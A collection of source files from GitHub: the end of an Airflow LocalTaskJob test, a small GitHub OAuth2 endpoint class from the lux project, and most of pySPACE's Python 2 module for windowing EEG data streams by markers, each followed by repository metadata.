task_id='test_state_succeeded1',
dag=dag,
on_success_callback=success_callback)
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
job1.task_runner = StandardTaskRunner(job1)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for _ in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
job1.heartbeat_callback(session=None)
self.assertTrue(data['called'])
process.join(timeout=10)
self.assertFalse(process.is_alive())
@pytest.fixture()
def clean_db_helper():
yield
clear_db_runs()
@pytest.mark.usefixtures("clean_db_helper")
class TestLocalTaskJobPerformance:
@pytest.mark.parametrize("return_codes", [[0], 9 * [None] + [0]]) # type: ignore
@mock.patch("airflow.jobs.local_task_job.get_task_runner")
def test_number_of_queries_single_loop(self, mock_get_task_runner, return_codes):
unique_prefix = str(uuid.uuid4())
dag = DAG(dag_id=f'{unique_prefix}_test_number_of_queries', start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_state_succeeded1', dag=dag)
dag.clear()
dag.create_dagrun(run_id=unique_prefix, state=State.NONE)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
mock_get_task_runner.return_value.return_code.side_effects = return_codes
job = LocalTaskJob(task_instance=ti, executor=MockExecutor())
with assert_queries_count(12):
job.run()
| {
"content_hash": "2a06bbb6b5b3d76d0ac68355fdeeb8c1",
"timestamp": "",
"source": "github",
"line_count": 420,
"max_line_length": 105,
"avg_line_length": 37.36666666666667,
"alnum_prop": 0.5825793296801325,
"repo_name": "wooga/airflow",
"id": "2d91efe32d92e7d21ca045fe197b0039c3db4a28",
"size": "16483",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/jobs/test_local_task_job.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "12126"
},
{
"name": "Dockerfile",
"bytes": "4084"
},
{
"name": "HTML",
"bytes": "128446"
},
{
"name": "JavaScript",
"bytes": "22118"
},
{
"name": "Mako",
"bytes": "1284"
},
{
"name": "Python",
"bytes": "5879650"
},
{
"name": "Shell",
"bytes": "41820"
}
],
"symlink_target": ""
} |
from ..oauth import OAuth2, register_oauth
@register_oauth
class Github(OAuth2):
'''Github api
https://developer.github.com/v3/
'''
auth_uri = 'https://github.com/login/oauth/authorize'
token_uri = 'https://github.com/login/oauth/access_token'
| {
"content_hash": "fa416e8bd5c9dee119898cca92be881d",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 61,
"avg_line_length": 24.272727272727273,
"alnum_prop": 0.6779026217228464,
"repo_name": "tazo90/lux",
"id": "47cfe4a1b2d73128570364737735530021e41961",
"size": "267",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lux/extensions/oauth/github/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "85029"
},
{
"name": "HTML",
"bytes": "17331"
},
{
"name": "JavaScript",
"bytes": "354892"
},
{
"name": "Python",
"bytes": "543161"
}
],
"symlink_target": ""
} |
""" Performs windowing of incoming stream and produces instances of fixed
length for preprocessing and classification.
The :class:`~pySPACE.missions.support.windower.SlidingWindower` class performs
windowing for the online setting where no markers are available.
The :class:`~pySPACE.missions.support.windower.MarkerWindower` class extracts
windows according to definitions like the presence or non-presence of markers.
Additionally, exclude conditions can be defined that exclude certain markers in
proximity to extracted events.
The :class:`~pySPACE.missions.support.windower.WindowFactory` loads a windowing
specification from a yaml file. The window definitions are then stored in a
dictionary which is then used by one of the Windowers
(:class:`~pySPACE.missions.support.windower.MarkerWindower`,
:class:`~pySPACE.missions.support.windower.SlidingWindower` etc.) to cut the
incoming data stream.
The Windower definition is always application specific and can contain many
keys/values. In order to construct your own windower definition see the short
explanation in :class:`~pySPACE.missions.support.windower.MarkerWindower`.
Time is always measured in ms.
If there are mistakes in time, this should be because of
unknown block size or frequency.
Additionally include conditions can be added to ensure the presence of certain
markers in a specific range. So 'or' conditions between the conditions are
reached by repeating the definitions of the marker with different exclude or
include definitions and 'and' conditions are simply reached by concatenation.
Negation is now possible by switching to the other kind of condition.
:Author: Timo Duchrow
:Created: 2008/08/29
:modified: Mario Michael Krell (include and exclude defs)
"""
__version__ = "$Revision: 451 $"
# __all__ = ['SlidingWindower, MarkerWindower, ExcludeDef, LabeledWindowDef']
import sys
import os
import numpy
import math
import yaml
from pySPACE.resources.data_types.time_series import TimeSeries
if __name__ == '__main__':
import unittest
debug = False
warnings = False
# debug = True
# warnings = True
class Windower(object):
"""Windower base class"""
def __init__(self, data_client):
self.data_client = data_client
if debug:
print("acquisition frequency:\t %d Hz"% data_client.dSamplingInterval)
print("server block size:\t %d samples"% data_client.stdblocksize)
def _mstosamples(self, ms):
"""Convert from milliseconds to number of samples based on the
parameters of data_client."""
if self.data_client.dSamplingInterval is None:
raise Exception, "data_client needs to be connected to determine "\
"acquisition frequency"
nsamples = ms * self.data_client.dSamplingInterval / 1000.0
if nsamples != int(nsamples):
import warnings
warnings.warn(" %s ms can not be converted to int number"\
" of samples with current sampling frequency (%s Hz)" \
% (ms, self.data_client.dSamplingInterval))
# since the current float representation is not equal to int, round
nsamples = round(nsamples)
return int(nsamples)
def _samplestoms(self, samples):
"""Convert from number of samples to milliseconds based on the
parameters of data_client."""
if self.data_client.dSamplingInterval is None:
raise Exception, "data_client needs to be connected to determine "\
"acquisition frequency"
ms = samples * 1000.0 / self.data_client.dSamplingInterval
return ms
@classmethod
def _load_window_spec(cls, windower_spec="", local_window_conf=False):
"""
Load the window definitions to extract the labeled samples
**Parameters**
:windower_spec:
file name of the windower specification
(*optional, default:`default_windower_spec`*)
:local_window_conf:
Windower file is looked up in the local directory if set True.
.. note: As default the spec_dir from `pySPACE.configuration`
is used to look up spec files.
Otherwise it is looked up in the subdirectory `windower` in
`node_chains` in the `spec_dir`, which is the better way of
using it.
(*optional, default: False*)
"""
if windower_spec == "":
window_definitions = WindowFactory.default_windower_spec()
return window_definitions
if type(windower_spec) == dict:
return WindowFactory.create_window_defs(windower_spec)
# check for 'yaml'-ending of the file
if ".yaml" not in windower_spec: # general substring search!
windower_spec = windower_spec + ".yaml"
if local_window_conf:
if windower_spec.count('/')==0:
#windows file should be in local directory
windower_spec_file_path = "./" + windower_spec
else:
#windower spec contains complete path
windower_spec_file_path = windower_spec
else:
import pySPACE
windower_spec_file_path = os.path.join(pySPACE.configuration.spec_dir,
"node_chains","windower",
windower_spec)
if os.path.exists(windower_spec_file_path):
windower_spec_file = open(windower_spec_file_path, 'r')
window_definitions = \
WindowFactory.window_definitions_from_yaml(windower_spec_file)
windower_spec_file.close()
else:
raise IOError('Windower: Windowing spec file '
+ windower_spec_file_path + ' not found!')
return window_definitions
class SlidingWindower(Windower):
"""An iterable class that produces sliding windows for online classification."""
def __init__(self, data_client, windowsizems=1000, stridems=100, underfull=False):
super(SlidingWindower, self).__init__(data_client)
# register sliding windower as consumer of EEG stream client
data_client.regcallback(self._addblock)
# convert intervals in ms to number of samples
self.stridems = stridems
self.stride = self._mstosamples(stridems)
self.windowsizems = windowsizems
self.windowsize = self._mstosamples(windowsizems)
self.underfull = underfull
if self.windowsizems % self.stridems != 0:
raise Exception, "window size needs to be a multiple of stride"
if self.stride % data_client.stdblocksize != 0:
raise Exception, "stride needs to be a multiple of blocksize " \
"(server is sending block size %d)" % data_client.stdblocksize
# NB: acqusition frequency is called mistakingly called ``sampling interval'''
# in Brain Products protocol.
# calculate number of required blocks
self.buflen = int(self.windowsize / data_client.stdblocksize)
# init to ring buffers, one for the samples, one for the markers
self.samplebuf = RingBuffer(self.buflen)
self.markerbuf = RingBuffer(self.buflen)
# determine how many blocks need to be read at once with client
self.readsize = self.stride / data_client.stdblocksize
if debug:
print("buflen:\t %d" % self.buflen)
print("readsize:\t %d" % self.readsize)
def __iter__(self):
return self
def next(self):
"""Retrieve the next window according to windowsize and stride."""
nread = 0 # number of blocks actually read
if len(self.samplebuf) == 0:
# the ring buffer is still completely empty, fill it
nread = self.data_client.read(nblocks=self.buflen)
if nread < self.buflen:
raise StopIteration
else:
# just replace required number of blocks
nread = self.data_client.read(nblocks=self.readsize)
if nread < self.readsize:
raise StopIteration
# copy ring buffer into one long array
ndsamplewin = numpy.hstack(self.samplebuf.get())
ndmarkerwin = numpy.hstack(self.markerbuf.get())
return (ndsamplewin, ndmarkerwin)
def _addblock(self, ndsamples, ndmarkers):
"""Add incoming data block to ring buffers"""
self.samplebuf.append(ndsamples)
self.markerbuf.append(ndmarkers)
class MarkerWindower(Windower):
"""returns (<numpy.ndarray> window, <str> class)
MarkerWindower maintains a ring buffer for incoming sample blocks. The
buffer is divided into three segments:
Example::
t0 t1 t3 t4 <---
+---------+---------+---------+---------+---------+---------+---------+
| block 1 | block 2 | block 3 | block 4 | block 5 | block 6 | block 7 |
+---------+---------+---------+---------+---------+---------+---------+
|< prebuflen = 3 >| |< postbuflen = 3 >|
[////////////////////////////][---------][/////////////////////////////]
history ``current'' lookahead
__________
scan
MarkerWindower scans windows for markers as they come in (block 7 in
example). When the block passes into the ``current`` section all windows
are extracted that meet the constraints. To accomplish this prebuflen
and postbuflen have been calculated so that the buffer enables extraction
of sufficient window lengths for all window definitions as well as
lookaheads.
A windowdef looks like:
.. code-block:: yaml
startmarker : "S 8"
endmarker : "S 9"
skip_ranges :
- {start : 0, end: 300000}
window_defs :
s16:
classname : LRP
markername : "S 16"
startoffsetms : -1280
endoffsetms : 0
excludedefs : []
includedefs : [immediate response]
null:
classname : NoLRP
markername : "null"
startoffsetms : -1280
endoffsetms : 0
excludedefs : [all]
exclude_defs:
all:
markernames : ["S 1", "S 2", "S 8", "S 16", "S 32"]
preexcludems : 2000
postexcludems : 2000
include_defs:
immediate_response:
markernames : ["S 32"]
preincludems: -200
postincludems: 1200
**Parameters**
:startmarker: name of the marker where at the earliest cutting begins
:endmarker: name of the marker where at the latest cutting ends
:skip_ranges: Not completely implemented!
The 'end' component results in
the parameter skipfirstms which tells
the windower, which time points to skip
at the beginning.
.. todo:: Change parameterization or code.
:window_def: includes names of definitions of window cuts
:classname: name of the label given to the window, when cut
:markername: name of the marker being in the 'current block'.
MUST BE A STRING!
.. note:: The ``null`` marker is a synthetic marker,
which is internally added to the stream
every *nullmarker_stride_ms* milliseconds.
Currently, this parameter has to be set
separately and is 1000ms by default.
:startoffsetms: start of the window relative to the marker in the 'current block'
:endoffsetms: end of the window relative to the marker in the 'current block'
:jitter: Not implemented! Was intended to add an
artificial jittering during the segmentation.
.. todo:: Delete completely!
:exclude_defs: excludes each marker in markernames defined by the interval
'[-preexcludems, postexludems]' relative to the window
marker lying at zero
:preexcludems: time before the window marker, where the exclude markers
are forbidden. This time can be chosen negative,
:postexcludems: time after the window marker, where the exclude markers
are forbidden. This time can be chosen negative.
:include_defs: everything is the same to exclude defs, except,
that one of the specified markers has to lie in the
interval.
Time is always measured in ms.
If there are mistakes in time, this should be because of
unknown block size or frequency.
**Class Parameters**
:data_client: Client, delivering the data
:windowdefs:
List of window definitions generated by
:func:`WindowFactory.create_window_defs`
(*optional, default: None*)
:debug: Enable debug print outs to command line
(*optional, default: False*)
:nullmarker_stride_ms:
Set artificial markers with this constant distance into the stream
with the Name "null". If this parameter is set to *None*,
no artificial markers are generated.
(*optional, default: 1000*)
:no_overlap:
Ignore the last sample in each window (important for streaming data)
(*optional, default: False*)
:data_consistency_check:
Currently it is only checked, that the standard deviation is not 0
(*optional, default: False*)
"""
# ==================
# = Initialization =
# ==================
def __init__(self, data_client, windowdefs=None, debug=False,
nullmarker_stride_ms=1000, no_overlap=False,
data_consistency_check=False):
super(MarkerWindower, self).__init__(data_client)
self.data_client = data_client
data_client.regcallback(self._addblock)
self.windowdefs = windowdefs
# Occurring key errors because of missing marker are collected to deliver
# just one warning. The treatment differs by usage: missing window
# markers deliver no window, excludedefs just ignore the key error and
# includedefs would also deliver no window, because the includedef can
# not be fulfilled if the marker can not be found.
self.keyerror = {}
# flags that indicate if we passed specified start and stop markers
self.start = False
self.end = False
# determines the minimal marker offset for a window to be cut out
# this is chanced when the start marker and the window marker are in
# the same block
self.min_markeroffset = 0
# occurrence of marker of a specific type in the buffer
self.buffermarkers = dict()
self.nullmarker_id = 0
self.nullmarker_stride = None
if nullmarker_stride_ms is not None:
self.nullmarker_stride = self._mstosamples(nullmarker_stride_ms)
self.buffermarkers["null"] = list()
self.next_nullmarker = 0 # number of samples to go until next
# nullmarker
self.nsamples_postscan = 0 # number of samples after extraction point
self.nsamples_prescan = 0 # number of samples before extraction point
self.nmarkers_prescan = 0 # max time markers should be remembered
# important for reduced buffermarkers
# nmarkers_postscan is equivalent to nsamples_postscan
if debug:
for wdef in windowdefs:
print wdef
# determine maximum extents of buffers and maximum time that markers
# should be remembered
(nsamples_prescan, nsamples_postscan, nsamples_max_premarkers) = \
self._max_scan_ranges()
self.nsamples_prescan = nsamples_prescan
self.nsamples_postscan = nsamples_postscan
self.nmarkers_prescan = nsamples_max_premarkers
if debug:
print " nsamples_prescan", nsamples_prescan
print " nsamples_postscan", nsamples_postscan
# calculate buffer length in terms of std blocksize
self.prebuflen = int(math.ceil(float(nsamples_prescan)/ \
data_client.stdblocksize))
self.postbuflen = int(math.ceil(float(nsamples_postscan)/ \
data_client.stdblocksize))
# + one middle block (the ``current'' block)
self.buflen = self.prebuflen + 1 + self.postbuflen
if debug:
print " stdblocksize", data_client.stdblocksize
print " prebuflen", self.prebuflen
print " postbuflen", self.postbuflen
print " buflen", self.buflen
print
# initialize the buffers
self.samplebuf = RingBuffer(self.buflen)
self.markerbuf = RingBuffer(self.buflen)
# determine the offset of the first sample in the incoming block
self.incoming_block_offset = self.postbuflen*self.data_client.stdblocksize
# the list of the markers in the current block that have not yet been
# handled (by calling the next() method of the iterator protocol)
self.cur_extract_windows = list()
# total number of blocks read
self.nblocks_read_total = 0
# additional parameters, e.g. security checks etc
self.data_consistency_check = data_consistency_check
self.no_overlap = no_overlap
if debug:
print(" extracting windows with %soverlap" % ("No " if self.no_overlap else ""))
def _max_scan_ranges(self):
"""Scan window and constraint definitions to determine maximum extent
of buffer for marker and for samples. Return (max_postscan_samples,
max_prescan_samples, max_prescan_markers)"""
# number of samples before and after extraction point that needs to
# be available at all times, always positive
nsamples_prescan = 0
nsamples_postscan = 0
# either positive or negative offset as in window definition
nsamples_prewin = 0
nsamples_postwin = 0
# determine size of pre and post buffer to accommodate all window
# definitions
for wdef in self.windowdefs:
if wdef.startoffsetms > wdef.endoffsetms:
raise Exception, "illegal window definition: "\
"startoffset needs to be smaller then endoffset."
nsamples_prewin = min(nsamples_prewin,
self._mstosamples(wdef.startoffsetms))
nsamples_postwin = max(nsamples_postwin,
self._mstosamples(wdef.endoffsetms))
# TODO: If-clauses may be droped or replaced by asserts:
# adjust pre-buffer length
if nsamples_prewin < 0:
nsamples_prescan = abs(nsamples_prewin)
else:
nsample_prescan = 0
# end of window is always later than start
if nsamples_postwin < 0:
nsamples_postscan = 0
else:
nsamples_postscan = nsamples_postwin
nmarkers_prescan = nsamples_prescan
# For the adaptions on the excludedefs and includedefs just the marker
# are relevant and not the samples (nmarkers_prescan).
# extend lookahead (nsamples_postscan) and nmarkers_prescan to cover
# excludes ...
for wdef in self.windowdefs:
if wdef.excludedefs is not None:
for exc in wdef.excludedefs:
nsamples_postscan = max(nsamples_postscan,
self._mstosamples(exc.postexcludems))
nmarkers_prescan = max(nmarkers_prescan,
self._mstosamples(exc.preexcludems))
#...and includes in the same range.
if wdef.includedefs is not None:
for inc in wdef.includedefs:
nsamples_postscan = max(nsamples_postscan,
self._mstosamples(inc.postincludems))
nmarkers_prescan = max(nmarkers_prescan,
self._mstosamples(inc.preincludems))
return (int(nsamples_prescan), int(nsamples_postscan),
int(nmarkers_prescan))
# ===============================
# = Handling of incoming blocks =
# ===============================
def _decmarkeroffsets(self):
"""Decrement all offsets for markers in buffer as new blocks come in."""
markers = self.buffermarkers.keys()
# decrement of marker offsets in buffer
for marker in markers:
# remove old markers that are out of scope
new_offsets = [x - self.data_client.stdblocksize
for x in self.buffermarkers[marker]
if x -self.data_client.stdblocksize >= (-1)*self.nmarkers_prescan
]
if len(new_offsets) == 0:
del self.buffermarkers[marker]
else:
self.buffermarkers[marker] = new_offsets
def _addblock(self, ndsamples, ndmarkers):
"""Add incoming block to ring buffer."""
self.nblocks_read_total += 1 # increment total number of blocks
self._decmarkeroffsets() # adjust marker offsets
self.samplebuf.append(ndsamples)
self.markerbuf.append(ndmarkers)
self._insertnullmarkers() # insert null markers
self._scanmarkers(ndmarkers) # scan for new markers
def _insertnullmarkers(self, debug=False):
"""Insert epsilon markers according to nullmarker stride."""
if self.nullmarker_stride is None:
return
if debug:
print "next_nullmarker", self.next_nullmarker
self.nullmarker_id = self.data_client.markerids["null"]
while self.next_nullmarker < self.data_client.stdblocksize:
if not self.buffermarkers.has_key(self.nullmarker_id):
self.buffermarkers[self.nullmarker_id] = list()
self.buffermarkers[self.nullmarker_id].append(
self.incoming_block_offset + self.next_nullmarker)
if debug:
print "inserting", \
self.incoming_block_offset + self.next_nullmarker
self.next_nullmarker += self.nullmarker_stride
self.next_nullmarker -= self.data_client.stdblocksize
def _scanmarkers(self, ndmarkers, debug=False):
"""Scan incoming block for markers.
self.buffermarkers contains offsets of markers w.r.t. to ``current``
block @ position 0
"""
for i, marker in enumerate(ndmarkers):
if marker != -1:
if self.buffermarkers.has_key(marker):
self.buffermarkers[marker].append(
self.incoming_block_offset + i)
else:
self.buffermarkers[marker]= [self.incoming_block_offset + i]
if debug:
print " scanmarkers ", self.buffermarkers
# ================================
# = Iteration protocol interface =
# ================================
def __iter__(self):
self.nwindow=0
return self
def next(self, debug=False):
"""Return next labeled window when used in iterator context."""
while len(self.cur_extract_windows) == 0:
# fetch the next block from data_client
if debug:
print "reading next block"
self._readnextblock()
self._extract_windows_cur_block()
if debug:
print " buffermarkers", self.buffermarkers
print " current block", self.samplebuf.get()[self.prebuflen][1,:]
# print " current extracted windows ", self.cur_extract_windows
(windef_name, current_window, class_, start_time, end_time, markers_cur_win) = \
self.cur_extract_windows.pop(0)
# TODO: Replace this by a decorator or something similar
current_window = numpy.atleast_2d(current_window.transpose())
current_window = TimeSeries(
input_array=current_window,
channel_names=self.data_client.channelNames,
sampling_frequency=self.data_client.dSamplingInterval,
start_time = start_time,
end_time = end_time,
name = "Window extracted @ %d ms, length %d ms, class %s" % \
(start_time, end_time - start_time, class_),
marker_name = markers_cur_win
)
current_window.generate_meta()
current_window.specs['sampling_frequency'] = self.data_client.dSamplingInterval
current_window.specs['wdef_name'] = windef_name
self.nwindow += 1
# return (ndsamplewin, ndmarkerwin)
return (current_window, class_)
def _readnextblock(self):
"""Read next block from EEG stream client."""
nread = 0 # number of blocks actually read
if len(self.samplebuf) == 0:
# fill ring buffer
nread = self.data_client.read(nblocks=self.buflen)
if nread < self.buflen:
raise StopIteration
for marker_id, offsets in self.buffermarkers.iteritems():
for offset in offsets:
if offset < 0 and warnings:
print >>sys.stderr, "warning: markers ignored when "\
"initializing buffer"
else:
# read the next block
nread = self.data_client.read()
if nread == 0:
raise StopIteration
def _extract_windows_cur_block(self):
"""Add windows for markers in current block to self.cur_extract_windows."""
for wdef in self.windowdefs:
# resolve to id
# if id does not exist ignore this window definition and go on
try:
markerid = self.data_client.markerids[wdef.markername]
except KeyError, e:
e=str(e)
if not self.keyerror.has_key(e):
self.keyerror[e]=wdef
print
print "windowdef warning: Marker ", e, "not found in the"
print self.keyerror[e]
continue
# if there exist a startmarker in the wdef resolve to id
if wdef.startmarker != None:
try:
startid = self.data_client.markerids[wdef.startmarker]
except KeyError, e:
e=str(e)
if not self.keyerror.has_key(e):
self.keyerror[e]=wdef
print
print "windowdef warning: Startmarker ", e, "not found in the"
print self.keyerror[e]
continue
# check if startmarker id has been seen in current buffer scope
if self.buffermarkers.has_key(startid) and \
self.buffermarkers[startid][0] < self.data_client.stdblocksize:
# if the startmarker is found we delete it from the window
# definition because from now on windows can be cut
wdef.startmarker = None
# in addition a start_flag is set and the min markeroffset
# for markers in this current block
self.start = True
self.min_markeroffset = self.buffermarkers[startid][0]
else:
continue
# check if corresponding marker id has been seen in current
# buffer scope or if the stopmarker is already True
if not self.buffermarkers.has_key(markerid) or self.end==True:
continue
# now prepare extraction windows for markers in the ``current'' block
# check if includedefs and excludedefs are fulfilled
for markeroffset in self.buffermarkers[markerid]:
if self.min_markeroffset <= markeroffset < self.data_client.stdblocksize and \
self._check_exclude_defs_ok(markeroffset, wdef.excludedefs) and \
self._check_include_defs_ok(markeroffset, wdef.includedefs):
try:
(extractwindow, start_time, end_time, markers_cur_win) = \
self._extractwindow(
markeroffset,
self._mstosamples(wdef.startoffsetms),
self._mstosamples(wdef.endoffsetms))
if self.data_consistency_check:
# test if extracted window has std zero
std = numpy.std(extractwindow,axis=1)
if sum(std < 10**-9): #can be considered as zero
# filter the channel names where std equals zero
zero_channels = [self.data_client.channelNames[index]
for (index,elem) in enumerate(std)
if elem < 10**-9]
print "Warning: Standard deviation of channel(s) " \
" %s in time interval [%.1f,%.1f] is zero!" \
% (str(zero_channels), start_time, end_time)
if wdef.skipfirstms is None or \
start_time > wdef.skipfirstms:
self.cur_extract_windows.append((wdef.windef_name,
extractwindow, wdef.classname, start_time,
end_time, markers_cur_win))
except MarkerWindowerException, e:
if warnings:
print >>sys.stderr, "warning:", e
# if this was the first window, adjust min_markeroffset before we
# move to the next block
if self.start:
self.min_markeroffset = 0
self.start = False
# check if the end of the stream is reached
if wdef.endmarker != None:
try:
endid = self.data_client.markerids[wdef.endmarker]
except KeyError, e:
e=str(e)
if not self.keyerror.has_key(e):
self.keyerror[e]=wdef
print
print "windowdef warning: Endmarker ", e, "not found in the"
print self.keyerror[e]
continue
# check if endmarker id has been seen in current buffer scope
if self.buffermarkers.has_key(endid):
if self.buffermarkers[endid][0] < 0 and not self.end:
# if the endmarker is reached we set the end-flag for window
# cutting to True
self.end = True
print "Endmarker found!"
raise StopIteration
def _check_exclude_defs_ok(self, markeroffset, excludedefs):
""" Check whether the exclude definitions match
.. note::
Changes in this section need to be checked also
in the following -check_include_defs_ok class,
because they are very similar.
"""
# Nothing to do if there are no excludedefs
if excludedefs is None or len(excludedefs)==0:
return True
# Check each exclude definition
for exc in excludedefs:
preexclude = markeroffset - self._mstosamples(exc.preexcludems)
if self.no_overlap:
postexclude = markeroffset + self._mstosamples(exc.postexcludems)
else:
postexclude = markeroffset + 1 + self._mstosamples(exc.postexcludems)
# Get markerid and skip if it does not exist.
try:
excmarkerid = self.data_client.markerids[exc.markername]
except KeyError, e:
e=str(e)
if not self.keyerror.has_key(e):
self.keyerror[e]=exc
print
print "exclude warning: Marker ", e, "not found in the ..."
print self.keyerror[e]
continue
# Skip if no proximal exclude marker seen
if not self.buffermarkers.has_key(excmarkerid):
continue
# Not ok, if exclude marker falls into exclude range
# This is the important part of this check!
# Question: Why not exc_marker <=postexclude or exc_marker > preexclude?
# Answer: Before one added
for exc_marker in self.buffermarkers[excmarkerid]:
# The inequation lets you exclude the same marker
# only a few seconds before or after the current marker,
# to deal with unwanted marker repetitions.
if preexclude <= exc_marker < postexclude and \
exc_marker != markeroffset:
return False
return True #if all excludedefs are fulfilled
def _check_include_defs_ok(self, markeroffset, includedefs):
"""Check whether all the include definitions match"""
#Code adapted from the previous exclude-check
#Checks if there are includedefs
if includedefs is None or len(includedefs)==0:
return True
# Check each include definition
for inc in includedefs:
preinclude = markeroffset - self._mstosamples(inc.preincludems)
if self.no_overlap:
postinclude = markeroffset + self._mstosamples(inc.postincludems)
else:
postinclude = markeroffset + 1 + self._mstosamples(inc.postincludems)
# Check allways breaks if the neccessary marker does not exist.
try:
incmarkerid = self.data_client.markerids[inc.markername]
except KeyError, e:
e=str(e)
if not self.keyerror.has_key(e):
self.keyerror[e]=inc
print
print "include warning: Marker ", e, "not found in the ..."
print self.keyerror[e]
return False
# Break if no proximal include marker seen (different to exclude,
# because include markers need to be proximal.)
if not self.buffermarkers.has_key(incmarkerid):
return False
# Not ok, if no include marker falls into include range
# It is important to remark that no includedefs using the current
# marker are allowed!
check = False # remembers if a check succeeded
for inc_marker in self.buffermarkers[incmarkerid]:
# inequality to use he same marker name for include def
if preinclude <= inc_marker < postinclude and \
inc_marker != markeroffset:
check = True
if not check:
return False
return True # If all includedefs are fulfilled
def _extractwindow(self, cur_sample_block_offset, start_offset, end_offset,
debug=False):
""" Extracts a sample window from the ring buffer and consolidates it
into a single numpy array object."""
# calculate current position with respect to prebuffer start
cur_sample_buf_offset = self.prebuflen * self.data_client.stdblocksize \
+ cur_sample_block_offset
buf_extract_start = cur_sample_buf_offset + start_offset
if self.no_overlap:
buf_extract_end = cur_sample_buf_offset + end_offset
else:
buf_extract_end = cur_sample_buf_offset + 1 + end_offset
if debug:
print "buf_extract_start", buf_extract_start
print "buf_extract_end", buf_extract_end
if buf_extract_start < 0:
raise MarkerWindowerException,"not enough history data available" \
" to extract window with start offset of %d samples" \
% start_offset
assert buf_extract_end >= 0
assert buf_extract_end <= self.buflen * self.data_client.stdblocksize
end_time_samples = \
(self.nblocks_read_total * self.data_client.stdblocksize) - \
(self.buflen * self.data_client.stdblocksize - buf_extract_end)
end_time = self._samplestoms(end_time_samples)
start_time_samples = end_time_samples - \
(buf_extract_end - buf_extract_start) + 1
start_time = self._samplestoms(start_time_samples)
# copy ring buffer into one long array and extract subwindow
ndsamplewin = numpy.hstack(self.samplebuf.get())[:,buf_extract_start:buf_extract_end]
markers_cur_window = self._extract_markers_cur_window(buf_extract_start, buf_extract_end)
return (ndsamplewin, start_time, end_time, markers_cur_window)
def _extract_markers_cur_window(self, buf_extract_start, buf_extract_end):
""" Filter out all markers that lie in the current window
to store this information. The markers are stored with their clear name
and temporal offset.
"""
markers_cur_window = dict()
for marker_id in self.buffermarkers:
for offset in self.buffermarkers[marker_id]:
if offset >= 0 \
and buf_extract_start <= offset < buf_extract_end \
and marker_id != self.nullmarker_id:
marker = self.data_client.markerNames[marker_id]
if not markers_cur_window.has_key(marker):
markers_cur_window[marker] = list()
markers_cur_window[marker].append(self._samplestoms(offset-buf_extract_start))
return markers_cur_window
# =====================
# = Exception classes =
# =====================
class MarkerWindowerException(Exception):
def __init__(self, arg):
super(MarkerWindowerException, self).__init__(arg)
# ==================================================
# = Support classes for definitions of constraints =
# ==================================================
class LabeledWindowDef(object):
"""Labeled window definition that is to be extracted from EEG stream."""
def __init__(self, windef_name, classname, markername, startoffsetms,
endoffsetms, excludedefs=None,includedefs=None,
skipfirstms=None, jitter=None,startmarker=None,endmarker=None):
super(LabeledWindowDef, self).__init__()
self.windef_name = windef_name
self.classname = classname
self.markername = markername # can be None
self.excludedefs = excludedefs
self.includedefs = includedefs
self.startoffsetms = startoffsetms
self.endoffsetms = endoffsetms
self.skipfirstms = skipfirstms
self.startmarker = startmarker
self.endmarker = endmarker
def __str__(self):
d = {'wdef' : self.windef_name, 'cls' : self.classname,
'skip_first' : self.skipfirstms, 'marker' : self.markername,
'start' : self.startoffsetms, 'end' : self.endoffsetms}
if d['marker'] == '':
d['marker'] = "''"
str_ = 'LabeledWindowDef %(wdef)s\n class: %(cls)s\n skip first: '\
'%(skip_first)s\n marker: %(marker)s\n start: %(start)d ms\n'\
' end: %(end)d ms\n' % d
# append exclude definitions if any
if self.excludedefs:
for exc in self.excludedefs:
for line in str(exc).splitlines():
str_ += " %s\n" % line
# append include definitions if any
if self.includedefs:
for inc in self.includedefs:
for line in str(inc).splitlines():
str_ += " %s\n" % line
return str_
class ExcludeDef(object):
"""Definition of exclude constraints for window extraction."""
def __init__(self, markername, preexcludems, postexcludems):
super(ExcludeDef, self).__init__()
self.markername = markername
self.preexcludems = preexcludems
self.postexcludems = postexcludems
def __str__(self):
d = {'name' : self.markername, 'pre' : self.preexcludems,
'post' : self.postexcludems}
str_ = 'ExcludeDef:\n markername: %(name)s\n'\
' preexclude: %(pre)d ms\n'\
' postexclude: %(post)d ms\n' % d
return str_
class IncludeDef(object):
"""Definition of include constraints for window extraction."""
# Same as exclude but with 'in'
def __init__(self, markername, preincludems, postincludems):
super(IncludeDef, self).__init__()
self.markername = markername
self.preincludems = preincludems
self.postincludems = postincludems
def __str__(self):
d = {'name' : self.markername, 'pre' : self.preincludems,
'post' : self.postincludems}
str_ = 'IncludeDef:\n markername: %(name)s\n'\
' preinclude: %(pre)d ms\n'\
' postinclude: %(post)d ms\n' % d
return str_
# ===============================
# = Ring buffer support classes =
# ===============================
class RingBuffer:
"""Generic ring buffer class"""
# Nice approach that makes use of dynamic classes
# http://code.activestate.com/recipes/68429/
def __init__(self,size_max):
self.max = size_max
self.data = []
def append(self,x):
"""append an element at the end of the buffer"""
self.data.append(x)
if len(self.data) == self.max:
self.cur=0
self.__class__ = RingBufferFull
def get(self):
""" return a list of elements from the oldest to the newest"""
return self.data
def __str__(self):
str_ = "RingBuffer with %d elements:" % len(self.data)
for d in self.data:
str_ += "\n%s" % d.__str__()
return str_
def __len__(self):
return len(self.data)
class RingBufferFull(RingBuffer):
"""Generic ring buffer when full"""
def __init__(self,n):
raise "RingBufferFull can't be directly instantiated"
def append(self,x):
self.data[self.cur]=x
self.cur=int((self.cur+1) % self.max)
def get(self):
return self.data[self.cur:]+self.data[:self.cur]
class WindowFactory(object):
